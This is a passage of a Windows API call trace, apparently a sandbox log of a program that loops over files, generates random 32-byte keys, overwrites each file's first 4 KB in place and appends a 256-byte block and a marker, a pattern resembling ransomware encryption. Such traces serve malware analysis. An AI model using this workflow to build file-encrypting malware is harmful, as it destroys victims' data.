RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.513] GetProcessHeap () returned 0x4f10000 [0079.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.513] GetProcessHeap () returned 0x4f10000 [0079.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.513] GetProcessHeap () returned 0x4f10000 [0079.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.513] GetProcessHeap () returned 0x4f10000 [0079.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.513] GetProcessHeap () returned 0x4f10000 [0079.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.513] GetProcessHeap () returned 0x4f10000 [0079.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.513] GetProcessHeap () returned 0x4f10000 [0079.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.513] GetProcessHeap () returned 0x4f10000 [0079.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.513] GetProcessHeap () returned 0x4f10000 [0079.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.513] GetProcessHeap () returned 0x4f10000 [0079.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.513] GetProcessHeap () returned 0x4f10000 [0079.513] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.513] GetProcessHeap () returned 0x4f10000 [0079.513] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.514] GetProcessHeap () returned 0x4f10000 [0079.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.514] GetProcessHeap () returned 0x4f10000 [0079.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.514] GetProcessHeap () returned 0x4f10000 [0079.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.514] GetProcessHeap () returned 0x4f10000 [0079.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0079.514] GetProcessHeap () returned 0x4f10000 [0079.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.514] GetProcessHeap () returned 0x4f10000 [0079.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0079.514] GetProcessHeap () returned 0x4f10000 [0079.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0079.514] GetProcessHeap () returned 0x4f10000 [0079.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0079.514] GetProcessHeap () returned 0x4f10000 [0079.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0079.514] SetFilePointerEx (in: hFile=0x82c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.514] WriteFile (in: hFile=0x82c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0079.514] WriteFile (in: hFile=0x82c, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0079.514] GetProcessHeap () returned 0x4f10000 [0079.515] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0079.515] GetProcessHeap () returned 0x4f10000 [0079.515] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0079.515] GetProcessHeap () returned 0x4f10000 [0079.515] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0079.515] CloseHandle (hObject=0x82c) returned 1 [0079.516] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 44 [0079.516] SetFilePointerEx (in: hFile=0x830, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.516] ReadFile (in: hFile=0x830, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0079.516] SetFilePointerEx (in: hFile=0x830, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.516] GetProcessHeap () returned 0x4f10000 [0079.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0079.516] GetProcessHeap () returned 0x4f10000 [0079.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0079.516] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0079.516] GetProcessHeap () returned 0x4f10000 [0079.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0079.516] ReadFile (in: hFile=0x830, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0079.564] SetFilePointerEx (in: hFile=0x830, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.564] WriteFile (in: hFile=0x830, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0079.564] GetProcessHeap () returned 0x4f10000 [0079.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0079.564] GetProcessHeap () returned 0x4f10000 [0079.564] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.564] GetProcessHeap () returned 0x4f10000 [0079.565] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0079.565] GetProcessHeap () returned 0x4f10000 [0079.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.565] GetProcessHeap () returned 0x4f10000 [0079.565] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0079.565] GetProcessHeap () returned 0x4f10000 [0079.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.565] GetProcessHeap () returned 0x4f10000 [0079.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.565] GetProcessHeap () returned 0x4f10000 [0079.565] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.565] GetProcessHeap () returned 0x4f10000 [0079.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.565] GetProcessHeap () returned 0x4f10000 [0079.565] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.565] GetProcessHeap () returned 0x4f10000 [0079.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.565] GetProcessHeap () returned 0x4f10000 [0079.565] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.565] GetProcessHeap () returned 0x4f10000 [0079.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.565] GetProcessHeap () returned 0x4f10000 [0079.565] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.565] GetProcessHeap () returned 0x4f10000 [0079.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.565] GetProcessHeap () returned 0x4f10000 [0079.565] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.565] GetProcessHeap () returned 0x4f10000 [0079.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.565] GetProcessHeap () returned 0x4f10000 [0079.565] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.565] GetProcessHeap () returned 0x4f10000 [0079.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.565] GetProcessHeap () returned 0x4f10000 [0079.565] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.565] GetProcessHeap () returned 0x4f10000 [0079.565] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.565] GetProcessHeap () returned 0x4f10000 [0079.566] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.566] GetProcessHeap () returned 0x4f10000 [0079.566] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.566] GetProcessHeap () returned 0x4f10000 [0079.566] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.566] GetProcessHeap () returned 0x4f10000 [0079.566] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.566] GetProcessHeap () returned 0x4f10000 [0079.566] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.566] GetProcessHeap () returned 0x4f10000 [0079.566] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.566] GetProcessHeap () returned 0x4f10000 [0079.566] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.566] GetProcessHeap () returned 0x4f10000 [0079.566] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.566] GetProcessHeap () returned 0x4f10000 [0079.566] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.566] GetProcessHeap () returned 0x4f10000 [0079.566] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.566] GetProcessHeap () returned 0x4f10000 [0079.566] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.566] GetProcessHeap () returned 0x4f10000 [0079.566] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.566] GetProcessHeap () returned 0x4f10000 [0079.566] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.566] GetProcessHeap () returned 0x4f10000 [0079.566] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.566] GetProcessHeap () returned 0x4f10000 [0079.566] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.566] GetProcessHeap () returned 0x4f10000 [0079.566] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.566] GetProcessHeap () returned 0x4f10000 [0079.566] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.566] GetProcessHeap () returned 0x4f10000 [0079.566] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0079.566] GetProcessHeap () returned 0x4f10000 [0079.566] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.566] GetProcessHeap () returned 0x4f10000 [0079.567] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0079.567] GetProcessHeap () returned 0x4f10000 [0079.567] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0079.567] GetProcessHeap () returned 0x4f10000 [0079.567] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0079.567] GetProcessHeap () returned 0x4f10000 [0079.567] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0079.567] GetProcessHeap () returned 0x4f10000 [0079.567] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0079.567] GetProcessHeap () returned 0x4f10000 [0079.567] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0079.567] GetProcessHeap () returned 0x4f10000 [0079.567] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x1f8) returned 0x7cf6bf8 [0079.567] GetProcessHeap () returned 0x4f10000 [0079.567] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0079.567] GetProcessHeap () returned 0x4f10000 [0079.567] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.567] GetProcessHeap () returned 0x4f10000 [0079.567] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0079.567] GetProcessHeap () returned 0x4f10000 [0079.567] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.567] GetProcessHeap () returned 0x4f10000 [0079.567] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.567] GetProcessHeap () returned 0x4f10000 [0079.567] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.567] GetProcessHeap () returned 0x4f10000 [0079.567] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.567] GetProcessHeap () returned 0x4f10000 [0079.567] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.567] GetProcessHeap () returned 0x4f10000 [0079.567] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.568] GetProcessHeap () returned 0x4f10000 [0079.568] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.568] GetProcessHeap () returned 0x4f10000 [0079.568] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.568] GetProcessHeap () returned 0x4f10000 [0079.568] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.568] GetProcessHeap () returned 0x4f10000 [0079.568] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.568] GetProcessHeap () returned 0x4f10000 [0079.568] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.568] GetProcessHeap () returned 0x4f10000 [0079.568] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.568] GetProcessHeap () returned 0x4f10000 [0079.568] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.568] GetProcessHeap () returned 0x4f10000 [0079.568] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.568] GetProcessHeap () returned 0x4f10000 [0079.568] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.568] GetProcessHeap () returned 0x4f10000 [0079.568] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.568] GetProcessHeap () returned 0x4f10000 [0079.568] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.568] GetProcessHeap () returned 0x4f10000 [0079.568] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.568] GetProcessHeap () returned 0x4f10000 [0079.568] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.568] GetProcessHeap () returned 0x4f10000 [0079.568] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.568] GetProcessHeap () returned 0x4f10000 [0079.569] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.569] GetProcessHeap () returned 0x4f10000 [0079.569] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.569] GetProcessHeap () returned 0x4f10000 [0079.569] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0079.569] GetProcessHeap () returned 0x4f10000 [0079.569] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.569] GetProcessHeap () returned 0x4f10000 [0079.569] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0079.569] GetProcessHeap () returned 0x4f10000 [0079.569] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0079.569] GetProcessHeap () returned 0x4f10000 [0079.569] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0079.569] GetProcessHeap () returned 0x4f10000 [0079.569] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0079.569] SetFilePointerEx (in: hFile=0x830, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.569] WriteFile (in: hFile=0x830, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0079.569] WriteFile (in: hFile=0x830, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0079.569] GetProcessHeap () returned 0x4f10000 [0079.569] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0079.569] GetProcessHeap () returned 0x4f10000 [0079.569] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0079.569] GetProcessHeap () returned 0x4f10000 [0079.569] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0079.569] CloseHandle (hObject=0x830) returned 1 [0079.571] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 45 [0079.571] SetFilePointerEx (in: hFile=0x834, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.571] ReadFile (in: hFile=0x834, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0079.571] SetFilePointerEx (in: hFile=0x834, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.571] GetProcessHeap () returned 0x4f10000 [0079.571] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0079.571] GetProcessHeap () returned 0x4f10000 [0079.571] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0079.571] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0079.571] GetProcessHeap () returned 0x4f10000 [0079.571] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0079.571] ReadFile (in: hFile=0x834, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0079.639] SetFilePointerEx (in: hFile=0x834, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.639] WriteFile (in: hFile=0x834, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0079.639] GetProcessHeap () returned 0x4f10000 [0079.639] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0079.640] GetProcessHeap () returned 0x4f10000 [0079.640] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.640] GetProcessHeap () returned 0x4f10000 [0079.640] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0079.640] GetProcessHeap () returned 0x4f10000 [0079.640] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.640] GetProcessHeap () returned 0x4f10000 [0079.640] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0079.640] GetProcessHeap () returned 0x4f10000 [0079.640] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.640] GetProcessHeap () returned 0x4f10000 [0079.640] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.640] GetProcessHeap () returned 0x4f10000 [0079.640] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.640] GetProcessHeap () returned 0x4f10000 [0079.640] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.640] GetProcessHeap () returned 0x4f10000 [0079.640] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.640] GetProcessHeap () returned 0x4f10000 [0079.640] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.640] GetProcessHeap () returned 0x4f10000 [0079.640] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.640] GetProcessHeap () returned 0x4f10000 [0079.640] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.640] GetProcessHeap () returned 0x4f10000 [0079.640] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.640] GetProcessHeap () returned 0x4f10000 [0079.640] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.640] GetProcessHeap () returned 0x4f10000 [0079.640] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.640] GetProcessHeap () returned 0x4f10000 [0079.640] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.640] GetProcessHeap () returned 0x4f10000 [0079.640] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.640] GetProcessHeap () returned 0x4f10000 [0079.640] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.641] GetProcessHeap () returned 0x4f10000 [0079.641] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.641] GetProcessHeap () returned 0x4f10000 [0079.641] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.641] GetProcessHeap () returned 0x4f10000 [0079.641] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.641] GetProcessHeap () returned 0x4f10000 [0079.641] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.641] GetProcessHeap () returned 0x4f10000 [0079.641] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.641] GetProcessHeap () returned 0x4f10000 [0079.641] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.641] GetProcessHeap () returned 0x4f10000 [0079.641] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.641] GetProcessHeap () returned 0x4f10000 [0079.641] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.641] GetProcessHeap () returned 0x4f10000 [0079.641] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.641] GetProcessHeap () returned 0x4f10000 [0079.641] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.641] GetProcessHeap () returned 0x4f10000 [0079.641] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.641] GetProcessHeap () returned 0x4f10000 [0079.641] RtlAllocateHeap 